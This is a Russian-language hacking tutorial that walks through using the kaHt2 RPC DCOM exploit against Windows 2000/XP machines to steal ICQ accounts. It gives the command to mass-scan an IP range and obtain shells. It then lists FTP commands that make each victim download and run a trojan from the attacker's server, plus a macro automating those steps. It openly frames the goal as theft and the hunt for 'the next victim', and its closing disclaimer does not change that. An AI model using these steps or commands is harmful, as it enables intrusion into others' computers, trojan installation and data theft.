В последнее время я стал наблюдать исчерпание способов угнать UIN. Все сводится к тому, чтобы зарегистрировать не существующий (а ранее существовавший) e-mail и выслать на него пароль.
Я решил немного исправить положение и написать эту статью.
Речь пойдет о нашумевшей дыре в протоколе RPC Dcom на Windows системах. Информация о дыре была опубликована 16 Июля, 2003 года командой "Last Stage of Delirium". Уязвимость существует во всех стандартных инсталляциях Windows NT 4.0, Windows 2000, Windows XP, а также в так широко разрекламированном Windows 2003.
Был выпущен многопоточный, многоцелевой эксплоит, эксплуатирующий уязвимость в RPC Dcom. Эксплоит работает против большинства версий Microsoft Windows 2000/XP систем. Поддерживает различные макросы. Этот эксплоит мы и будем использовать для наших корыстных целей.
Скачиваем kaHt2, разархивируем архив в корень диска "С:\", после чего открываем "Srart -> Run" и вбиваем следующею команду "C\:kaHt2.exe 195.96.185.1 195.96.185.255 300 " и жмем "Ok". "195.96.185.1 195.96.185.255" это диапазон IP, которые будут сканироваться. "300" это количество потоков сканирования.
В случаи нахождения уязвимой машины, вы увидите примерно эту строчку "C:\WINDOWS\system32>".
Дальше нам надо закачать троян и с помощью него скачать .dat файл или любую вас интересующую информацию.
Качаем RPC Exploit GUI v2, разархивируем и запускаем "RPC GUI v2 - r3L4x.exe", после чего идем в раздел "FTP Server" и запускаем свой FTP сервер нажатием на кнопку "Start".
Выбор трояна для использования оставляю на ваш выбор, этого добра в инете полным полно.
Допустим что вы выбрали троян и создали сервер для закачки, назвав его trojan_server.exe. Далее кладем trojan_server.exe в корень диска "C:\".
Возвращаемся к нашему эксплоиту и выполняем следующие команды:
1) Пишем "ftp", если все правильно, то вас перекинет на следующую строчку.
2) Пишем "open xxx.xx.xxx.xxx" вместо крестов - ваш IP.
3) Если предыдущий пункт выполнен правильно, вас спросят имя пользователя, тут пишем "asdf".
4) Пишем "get /trojan_server.exe" чтобы атакуемый компьютер скачал ваш троян.
5) Пишем "!trojan_server.exe" чтобы атакуемый компьютер запустил ваш троян .
6) Пишем "exit" чтобы выйти с шела уязвимой машины и начать поиски следующей жертвы.
Я упростил эти действия, написав маленький макрос. Макрос должен лежать в одной директории с kaHt2.exe и называться macros.txt. Открываете macros.txt, стираете все содержимое файла и вбиваете следующий текст:
"[Macro]
name=upload_trojan
key=!1
delay=900
cmd=ftp
cmd=open xxx.xx.xxx.xxx
cmd=asdf
cmd=get \trojan_server.exe
cmd=!trojan_server.exe>>a
cmd=bye"
После чего вам остается лишь набрать "!1" в шеле и все эти команды будут выполнены автоматом, ну а дальше пишите "exit" чтобы выйти с шела и начать искать нового "друга" .
Вроде бы все разложил по полочкам, так что вопросов, думаю, появится не должно.
Убедительная просьба если будете где выкладывать эту статью, ставить копирайт на автора (ven000m) и на этот сайт (Asechka.ru).
Всем спасибо, все свободны.
Обсуждение в форуме.
Использованные файлы:
kaHt2 – скачать.
RPC Exploit GUI v2 – скачать.
Использованный материал:
VOID.RU
securitylab.ru
Статья написано только для ознакомления. Автор не несет не какой ответственности за действия описанные в этой статье.